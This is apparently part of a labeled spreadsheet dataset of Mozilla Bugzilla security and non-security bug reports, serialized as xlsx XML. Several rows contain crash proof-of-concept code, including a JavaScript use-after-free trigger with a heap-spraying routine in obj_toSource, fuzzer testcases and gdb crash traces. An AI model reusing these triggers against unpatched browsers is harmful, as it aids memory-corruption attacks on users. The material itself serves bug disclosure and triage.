      <c r="V2788" t="n">
        <v>34</v>
      </c>
      <c r="W2788" t="inlineStr">
        <is>
          <t>The following line will process tags received from a remote server (getpocket.com) as HTML code without doing any sanitizing:
https://hg.mozilla.org/mozilla-central/file/34fce7c12173bdd6dda54c2ebf6d344252f1ac48/browser/extensions/pocket/content/panels/js/saved.js#l33
If this server is compromised it will be able to run JavaScript code in the context of the about:pocket-saved page whenever the user saves something to Pocket. This page isn't privileged and it is properly isolated in &lt;iframe type="content"&gt;. However, at the very least it has access to the Pocket extension's messaging API already outlined in bug 1320039 - and unlike with the proof-of-concept there the communication can go both ways here.</t>
        </is>
      </c>
      <c r="X2788" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2789">
      <c r="A2789" t="n">
        <v>682335</v>
      </c>
      <c r="B2789" t="inlineStr">
        <is>
          <t>2011-08-26 10:49:00 -0700</t>
        </is>
      </c>
      <c r="C2789" t="inlineStr">
        <is>
          <t>Investigate crash [@ WebGLContext::BufferSubData_array]</t>
        </is>
      </c>
      <c r="D2789" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:25 -0700</t>
        </is>
      </c>
      <c r="E2789" t="n">
        <v>1</v>
      </c>
      <c r="F2789" t="n">
        <v>1</v>
      </c>
      <c r="G2789" t="n">
        <v>3</v>
      </c>
      <c r="H2789" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2789" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2789" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2789" t="inlineStr">
        <is>
          <t>6 Branch</t>
        </is>
      </c>
      <c r="L2789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2789" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2789" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2789" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2789" t="inlineStr">
        <is>
          <t>[sg:critical?][qa+]</t>
        </is>
      </c>
      <c r="Q2789" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2789" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2789" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T2789" t="n">
        <v>1</v>
      </c>
      <c r="U2789" t="n">
        <v>0</v>
      </c>
      <c r="V2789" t="n">
        <v>38</v>
      </c>
      <c r="W2789" t="inlineStr">
        <is>
          <t>Created attachment 556072
PoC - Crashes Firefox 6
Ben Hawkes reported the following to security@m.o yesterday.  There are 31MB of uncompressed testcases (4MB compressed) so, for the purposes of this bug, I am going to remove the testcases beyond the one where he observes the crash. Otherwise I won't be able to attach the PoC to Bugzilla.
I'll separately follow up with Ben to see if there is a way we can get the testcase generator and perhaps integrate it into our existing fuzzers.
------
Hi,
I'm getting a reliable crash in WebGLContext::BufferSubData_array in Firefox 6.0 while doing some basic fuzzing of WebGL/GLESSL. I'm having some trouble finding the root-cause (presumably its a use-after-free), but since the crash looks exploitable I thought I'd get you guys involved early to help investigate further.
The attached test cases are run sequentially from "harness01.html" (starting from test 3750.html) and I reliably see the crash at 4169.html on a Linux system using the proprietary NVidia driver. Stack trace as follows:
Program received signal SIGSEGV, Segmentation fault.
0xf675e700 in mozilla::WebGLBuffer::CopySubDataIfElementArray
(this=0x54ff8680, byteOffset=558000083, byteLength=16948,
data=0xb7e01000)
    at /usr/include/bits/string3.h:52
52        return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest));
(gdb) x/i 0xf675e700
=&gt; 0xf675e700 &lt;mozilla::WebGLBuffer::CopySubDataIfElementArray(GLuint,
GLuint, void const*)+32&gt;:        rep movsb %ds:(%esi),%es:(%edi)
(gdb) i r esi edi ecx
esi            0xb7e01000       -1210052608
edi            0x214267d3       558000083
ecx            0x4234   16948
(gdb) x/bx 0x214267d3
0x214267d3:     Cannot access memory at address 0x214267d3
(gdb) bt
#0  0xf675e700 in mozilla::WebGLBuffer::CopySubDataIfElementArray
(this=0x54ff8680, byteOffset=558000083, byteLength=16948,
data=0xb7e01000)
    at /usr/include/bits/string3.h:52
#1  0xf674e540 in mozilla::WebGLContext::BufferSubData_array
(this=0x1c3f32e0, target=34963, byteOffset=558000083, wa=0x53b70600)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/content/canvas/src/WebGLContextGL.cpp:560
#2  0xf6b80ca8 in nsIDOMWebGLRenderingContext_BufferSubData
(cx=0xe90b3290, argc=3, vp=0xf19ff0e8)
    at ../../../../dist/include/CustomQS_WebGL.h:208
#3  0xf72fe8f9 in CallCompiler::generateNativeStub() () from
/source/firefox/firefox32/mozilla-release/objdir-ff-dbg32/dist/bin/libxul.so
#4  0xf72fa26f in js::mjit::ic::NativeCall (f=..., ic=0x54ff8680)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/js/src/methodjit/MonoIC.cpp:1026
#5  0xe49acf28 in ?? ()
#6  0xf72aba8c in EnterMethodJIT (cx=0x0, safePoint=0xe49661dc)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/js/src/methodjit/MethodJIT.cpp:685
#7  CheckStackAndEnterMethodJIT (cx=0x0, safePoint=0xe49661dc)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/js/src/methodjit/MethodJIT.cpp:715
#8  js::mjit::JaegerShotAtSafePoint (cx=0x0, safePoint=0xe49661dc)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/js/src/methodjit/MethodJIT.cpp:742
#9  0xf7362522 in js::Interpret (cx=0xe90b3290, entryFrame=0xf19ff068,
inlineCallCount=1, interpMode=js::JSINTERP_NORMAL)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/js/src/jsinterp.cpp:6347
#10 0xf71788c1 in js::RunScript (cx=0xe90b3290, script=0x537ff900,
fp=0xf19ff068)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/js/src/jsinterp.cpp:613
#11 0xf71794a5 in js::Invoke (cx=0xe90b3290, argsRef=...,
option=js::INVOKE_NORMAL)
    at /usr/local/google/source/firefox/firefox32/mozilla-release/js/src/jsinterp.cpp:694
etc
Note: I was only able to reproduce this on 32-bit builds, my 64-bit build would not trigger this crash.
Thanks,
Ben</t>
        </is>
      </c>
      <c r="X2789" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2790">
      <c r="A2790" t="n">
        <v>1306044</v>
      </c>
      <c r="B2790" t="inlineStr">
        <is>
          <t>2016-09-28 10:13:24 -0700</t>
        </is>
      </c>
      <c r="C2790" t="inlineStr">
        <is>
          <t>Create an NSURLProtocol that uses the Focus blocklists</t>
        </is>
      </c>
      <c r="D2790" t="inlineStr">
        <is>
          <t>2016-10-20 10:33:37 -0700</t>
        </is>
      </c>
      <c r="E2790" t="n">
        <v>1</v>
      </c>
      <c r="F2790" t="n">
        <v>1</v>
      </c>
      <c r="G2790" t="n">
        <v>2</v>
      </c>
      <c r="H2790" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2790" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2790" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K2790" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2790" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2790" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2790" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2790" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2790" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q2790" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2790" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2790" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2790" t="n">
        <v>1</v>
      </c>
      <c r="U2790" t="n">
        <v>0</v>
      </c>
      <c r="V2790" t="n">
        <v>3</v>
      </c>
      <c r="W2790" t="inlineStr">
        <is>
          <t>The final step in our content blocking experiments. Once we have UIWebView in place, we can implement a proxy that will allow us to block requests filtered by URLs in the blocklists.</t>
        </is>
      </c>
      <c r="X2790" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2791">
      <c r="A2791" t="n">
        <v>877287</v>
      </c>
      <c r="B2791" t="inlineStr">
        <is>
          <t>2013-05-29 11:39:30 -0700</t>
        </is>
      </c>
      <c r="C2791" t="inlineStr">
        <is>
          <t>Assertion failure: !cx-&gt;compartment-&gt;activeAnalysis, at jsinterp.cpp:365 or Crash [@ js::ion::CodeGenerator::link] with Proxy</t>
        </is>
      </c>
      <c r="D2791" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:30 -0800</t>
        </is>
      </c>
      <c r="E2791" t="n">
        <v>1</v>
      </c>
      <c r="F2791" t="n">
        <v>1</v>
      </c>
      <c r="G2791" t="n">
        <v>3</v>
      </c>
      <c r="H2791" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2791" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2791" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2791" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2791" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2791" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2791" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2791" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2791" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main22+]</t>
        </is>
      </c>
      <c r="Q2791" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2791" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2791" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T2791" t="n">
        <v>1</v>
      </c>
      <c r="U2791" t="n">
        <v>0</v>
      </c>
      <c r="V2791" t="n">
        <v>54</v>
      </c>
      <c r="W2791" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision e58336e81395 (run with --ion-eager):
this.__proto__ = null;
var p = Proxy.create({
    has : function(id) {}
});
Object.prototype.__proto__ = p;
evaluate("var Uint16Array = 0;");</t>
        </is>
      </c>
      <c r="X2791" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2792">
      <c r="A2792" t="n">
        <v>1594301</v>
      </c>
      <c r="B2792" t="inlineStr">
        <is>
          <t>2019-11-05 21:23:02 -0800</t>
        </is>
      </c>
      <c r="C2792" t="inlineStr">
        <is>
          <t>Try repository broken - Try tree closed</t>
        </is>
      </c>
      <c r="D2792" t="inlineStr">
        <is>
          <t>2019-11-05 23:35:12 -0800</t>
        </is>
      </c>
      <c r="E2792" t="n">
        <v>1</v>
      </c>
      <c r="F2792" t="n">
        <v>1</v>
      </c>
      <c r="G2792" t="n">
        <v>5</v>
      </c>
      <c r="H2792" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2792" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J2792" t="inlineStr">
        <is>
          <t>Mercurial: hg.mozilla.org</t>
        </is>
      </c>
      <c r="K2792" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2792" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2792" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2792" t="inlineStr"/>
      <c r="Q2792" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2792" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2792" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2792" t="n">
        <v>1</v>
      </c>
      <c r="U2792" t="n">
        <v>0</v>
      </c>
      <c r="V2792" t="n">
        <v>2</v>
      </c>
      <c r="W2792" t="inlineStr">
        <is>
          <t>Try pushes don't show up on treeherder</t>
        </is>
      </c>
      <c r="X2792" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2793">
      <c r="A2793" t="n">
        <v>431657</v>
      </c>
      <c r="B2793" t="inlineStr">
        <is>
          <t>2008-05-01 04:58:13 -0700</t>
        </is>
      </c>
      <c r="C2793" t="inlineStr">
        <is>
          <t>in the name of saving disk space, mozilla2 buildbot nightlies should delete their trees at the end of a build</t>
        </is>
      </c>
      <c r="D2793" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2793" t="n">
        <v>1</v>
      </c>
      <c r="F2793" t="n">
        <v>1</v>
      </c>
      <c r="G2793" t="n">
        <v>5</v>
      </c>
      <c r="H2793" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2793" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2793" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2793" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2793" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2793" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2793" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2793" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2793" t="inlineStr">
        <is>
          <t>[scheduled for may 5]</t>
        </is>
      </c>
      <c r="Q2793" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2793" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2793" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2793" t="n">
        <v>1</v>
      </c>
      <c r="U2793" t="n">
        <v>0</v>
      </c>
      <c r="V2793" t="n">
        <v>11</v>
      </c>
      <c r="W2793" t="inlineStr">
        <is>
          <t>As we add more branches to the Mozilla2 Buildbot disk space on the slaves is going to become a larger issue. Currently, we keep 2 trees for each branch, one for dep builds, one for nightlies. (At some point we should look at having nightly builds done off of the dep builder, but that's a much bigger issue.) We can easily save a bunch of disk space by simply having the nightly builder clobber its build directory (tree + symbol directories) after uploading the build, symbols, etc. 
IIRC it used to be a big deal to keep thy symbol directories around on fx-win32-tbox but I'm not sure if this has changed with the symbol server. CC'ing folks in case there's objections.</t>
        </is>
      </c>
      <c r="X2793" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2794">
      <c r="A2794" t="n">
        <v>568073</v>
      </c>
      <c r="B2794" t="inlineStr">
        <is>
          <t>2010-05-25 14:24:11 -0700</t>
        </is>
      </c>
      <c r="C2794" t="inlineStr">
        <is>
          <t>GC hazard in obj_toSource</t>
        </is>
      </c>
      <c r="D2794" t="inlineStr">
        <is>
          <t>2010-10-30 18:14:10 -0700</t>
        </is>
      </c>
      <c r="E2794" t="n">
        <v>1</v>
      </c>
      <c r="F2794" t="n">
        <v>1</v>
      </c>
      <c r="G2794" t="n">
        <v>3</v>
      </c>
      <c r="H2794" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2794" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2794" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2794" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L2794" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2794" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2794" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2794" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2794" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey [keep hidden until 566141 is fixed]</t>
        </is>
      </c>
      <c r="Q2794" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2794" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2794" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2794" t="n">
        <v>1</v>
      </c>
      <c r="U2794" t="n">
        <v>0</v>
      </c>
      <c r="V2794" t="n">
        <v>13</v>
      </c>
      <c r="W2794" t="inlineStr">
        <is>
          <t>obj_toSource contains the following pattern:
obj-&gt;lookupProperty(cx, id, &amp;obj2, &amp;prop);
...
obj-&gt;getProperty(cx, id, &amp;val[0]);
...
obj2-&gt;dropProperty(cx, prop);
Similarly to the bug 566141 the code calls obj2-&gt;dropProperty after doing potentially complex operations. Again, as with the bug 566141, the proxies makes the bug easier to exploit but AFAICS on branches the liveconnect can be used to archive the same results as the getProperty call can run arbitrary Java code that can in turn call JS.
Here is a test case that crashes the current TM tip:
var obj = {x: 0};
// Make a proxy property of a getter/setter so enumerateOwn will be invoked
// during initial scanning of the object tree. The function than deletes
// a property from the object so property lookup during the enumeration
// will go into prototype.
function f() {}
f.p = Proxy.create({ enumerateOwn: function() {
            delete obj.x;
            return [];
        }});
obj.__defineGetter__.call(obj, 'a', f);
obj.__defineSetter__.call(obj, 'a', f);
var buffer = [];
for (var i = 0; i != 4000; ++i)
    buffer.push({});
function force_gc() {
    print('gc');
    buffer = null;
    gc();
    buffer = [];
    for (var i = 0; i != 1e5; ++i)
        buffer.push("123456".substring(1));
}
// Make another proxy a prototype of Object.prototype. The has method for this
// proxy is called for the deleted property x during attribute lookup in
// obj_toSource. The method restores Object.prototype.__proto__ back to null
// and defines a getter for the x on the original object. This getter triggers
// gc that collects now unrooted proxy object and spray the freed GC arenas
// with strings leading to a crash during dropProperty call.
Object.prototype.__proto__ = Proxy.create({
      has: function(name) {
            if (name == "x") {
                Object.prototype.__proto__ = null;
                obj.__defineGetter__('x', force_gc);
                return true;
            }
            return false;
        },
      getOwnPropertyDescriptor: function(name) { return {}; }
    });
obj.toSource();</t>
        </is>
      </c>
      <c r="X2794" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2795">
      <c r="A2795" t="n">
        <v>814839</v>
      </c>
      <c r="B2795" t="inlineStr">
        <is>
          <t>2012-11-24 03:40:57 -0800</t>
        </is>
      </c>
      <c r="C2795" t="inlineStr">
        <is>
          <t>WebGL crash [@mozilla::WebGLContext::Clear] during conformance test</t>
        </is>
      </c>
      <c r="D2795" t="inlineStr">
        <is>
          <t>2013-08-23 15:59:28 -0700</t>
        </is>
      </c>
      <c r="E2795" t="n">
        <v>1</v>
      </c>
      <c r="F2795" t="n">
        <v>1</v>
      </c>
      <c r="G2795" t="n">
        <v>3</v>
      </c>
      <c r="H2795" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2795" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2795" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2795" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2795" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2795" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2795" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2795" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2795" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q2795" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2795" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2795" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T2795" t="n">
        <v>1</v>
      </c>
      <c r="U2795" t="n">
        <v>0</v>
      </c>
      <c r="V2795" t="n">
        <v>42</v>
      </c>
      <c r="W2795" t="inlineStr">
        <is>
          <t>Created attachment 684839
callstack
https://www.khronos.org/registry/webgl/sdk/tests/conformance/extensions/webgl-depth-texture.html
Device ID: 0x fd5
GPU Accelerated Windows: 1/1 OpenGL
Vendor ID: 0x10de
WebGL Renderer: NVIDIA Corporation -- NVIDIA GeForce GT 650M OpenGL Engine</t>
        </is>
      </c>
      <c r="X2795" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2796">
      <c r="A2796" t="n">
        <v>463452</v>
      </c>
      <c r="B2796" t="inlineStr">
        <is>
          <t>2008-11-06 10:00:15 -0800</t>
        </is>
      </c>
      <c r="C2796" t="inlineStr">
        <is>
          <t>SQL DB creation does not set files protections to 0600</t>
        </is>
      </c>
      <c r="D2796" t="inlineStr">
        <is>
          <t>2013-07-31 09:40:36 -0700</t>
        </is>
      </c>
      <c r="E2796" t="n">
        <v>1</v>
      </c>
      <c r="F2796" t="n">
        <v>1</v>
      </c>
      <c r="G2796" t="n">
        <v>3</v>
      </c>
      <c r="H2796" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2796" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J2796" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K2796" t="inlineStr">
        <is>
          <t>3.12.2</t>
        </is>
      </c>
      <c r="L2796" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2796" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2796" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2796" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2796" t="inlineStr">
        <is>
          <t>FIPS SUN_MUST_HAVE</t>
        </is>
      </c>
      <c r="Q2796" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2796" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2796" t="inlineStr">
        <is>
          <t>3.12.3</t>
        </is>
      </c>
      <c r="T2796" t="n">
        <v>1</v>
      </c>
      <c r="U2796" t="n">
        <v>0</v>
      </c>
      <c r="V2796" t="n">
        <v>13</v>
      </c>
      <c r="W2796" t="inlineStr">
        <is>
          <t>The old database explicitly protected the NSS database files with user rw and all other's no access. At least the key DB, and preferably the others need this protection as well.</t>
        </is>
      </c>
      <c r="X2796" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2797">
      <c r="A2797" t="n">
        <v>1254164</v>
      </c>
      <c r="B2797" t="inlineStr">
        <is>
          <t>2016-03-07 08:25:13 -0800</t>
        </is>
      </c>
      <c r="C2797" t="inlineStr">
        <is>
          <t>Assertion failure: !IsUninitializedLexical(obj.aliasedVar(sc)), at js/src/vm/Interpreter-inl.h:245</t>
        </is>
      </c>
      <c r="D2797" t="inlineStr">
        <is>
          <t>2016-09-22 17:18:53 -0700</t>
        </is>
      </c>
      <c r="E2797" t="n">
        <v>1</v>
      </c>
      <c r="F2797" t="n">
        <v>1</v>
      </c>
      <c r="G2797" t="n">
        <v>3</v>
      </c>
      <c r="H2797" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2797" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2797" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2797" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2797" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2797" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2797" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2797" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2797" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+][adv-esr45.1+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q2797" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2797" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2797" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T2797" t="n">
        <v>1</v>
      </c>
      <c r="U2797" t="n">
        <v>0</v>
      </c>
      <c r="V2797" t="n">
        <v>26</v>
      </c>
      <c r="W2797" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision b6acf4d4fc20 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2):
var s = '';
for (var i = 0; i &lt; 70000; i++)
    s += 'function x' + i + '() { x' + i + '(); }\n';
eval("(function() { " + s + " })();");
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000467d12 in js::SetAliasedVarOperation (checkLexical=js::CheckLexical, val=..., sc=..., obj=..., pc=0x7fffef2b1ff1 "\211", script=0x7ffff7e6e300, cx=0x7ffff6907800) at js/src/vm/Interpreter-inl.h:245
#0  0x0000000000467d12 in js::SetAliasedVarOperation (checkLexical=js::CheckLexical, val=..., sc=..., obj=..., pc=0x7fffef2b1ff1 "\211", script=0x7ffff7e6e300, cx=0x7ffff6907800) at js/src/vm/Interpreter-inl.h:245
#1  0x0000000000ab3fc5 in SetAliasedVarOperation (checkLexical=js::CheckLexical, val=..., sc=..., obj=..., pc=0x7fffef2b1ff1 "\211", script=0x7ffff7e6e300, cx=0x7ffff6907800) at js/src/vm/Interpreter-inl.h:245
#2  Interpret (cx=cx@entry=0x7ffff6907800, state=...) at js/src/vm/Interpreter.cpp:3166
#3  0x0000000000ab8828 in js::RunScript (cx=cx@entry=0x7ffff6907800, state=...) at js/src/vm/Interpreter.cpp:428
#4  0x0000000000aba373 in js::ExecuteKernel (cx=cx@entry=0x7ffff6907800, script=..., script@entry=..., scopeChainArg=..., newTargetValue=..., evalInFrame=..., evalInFrame@entry=..., result=&lt;optimized out&gt;) at js/src/vm/Interpreter.cpp:684
#5  0x00000000005e6e7d in EvalKernel (cx=cx@entry=0x7ffff6907800, args=..., evalType=evalType@entry=DIRECT_EVAL, caller=..., scopeobj=..., scopeobj@entry=..., pc=&lt;optimized out&gt;) at js/src/builtin/Eval.cpp:332
#6  0x00000000005e7806 in js::DirectEval (cx=cx@entry=0x7ffff6907800, args=...) at js/src/builtin/Eval.cpp:439
#7  0x00000000006152bf in js::jit::DoCallFallback (cx=0x7ffff6907800, frame=0x7fffffffc548, stub_=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=0x7fffffffc4f8, res=...) at js/src/jit/BaselineIC.cpp:6125
#8  0x00007ffff7ff1abf in ?? ()
[...]
#30 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7ffff6907800	140737330051072
rcx	0x7ffff6ca588d	140737333844109
rdx	0x0	0
rsi	0x7ffff6f7a9d0	140737336814032
rdi	0x7ffff6f791c0	140737336807872
rbp	0x7fffffffb080	140737488334976
rsp	0x7fffffffb080	140737488334976
r8	0x7ffff7fdf7c0	140737354004416
r9	0x6372732f736a2f6c	7165916604736876396
r10	0x7fffffffae40	140737488334400
r11	0x7ffff6c27ee0	140737333329632
r12	0x7ffff7e69100	140737352470784
r13	0x7ffff6907830	140737330051120
r14	0x1be1d20	29236512
r15	0x4000000	67108864
rip	0x467d12 &lt;js::SetAliasedVarOperation(js::MaybeCheckLexical, JS::Value const&amp;, js::ScopeCoordinate, js::ScopeObject&amp;, jsbytecode*, JSScript*, JSContext*)+28&gt;
=&gt; 0x467d12 &lt;js::SetAliasedVarOperation(js::MaybeCheckLexical, JS::Value const&amp;, js::ScopeCoordinate, js::ScopeObject&amp;, jsbytecode*, JSScript*, JSContext*)+28&gt;:	movl   $0xf5,0x0
   0x467d1d &lt;js::SetAliasedVarOperation(js::MaybeCheckLexical, JS::Value const&amp;, js::ScopeCoordinate, js::ScopeObject&amp;, jsbytecode*, JSScript*, JSContext*)+39&gt;:	callq  0x4a6f30 &lt;abort()&gt;
Note: This test might run up to 20 seconds. I'm marking this s-s until investigated because I remember that at some point we had a security bug with this assertion.</t>
        </is>
      </c>
      <c r="X2797" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2798">
      <c r="A2798" t="n">
        <v>1566413</v>
      </c>
      <c r="B2798" t="inlineStr">
        <is>
          <t>2019-07-16 05:03:48 -0700</t>
        </is>
      </c>
      <c r="C2798" t="inlineStr">
        <is>
          <t>Suite: local-dev image in suite should allow UTF-8 chars in console.</t>
        </is>
      </c>
      <c r="D2798" t="inlineStr">
        <is>
          <t>2019-07-24 10:30:23 -0700</t>
        </is>
      </c>
      <c r="E2798" t="n">
        <v>1</v>
      </c>
      <c r="F2798" t="n">
        <v>1</v>
      </c>
      <c r="G2798" t="n">
        <v>7</v>
      </c>
      <c r="H2798" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
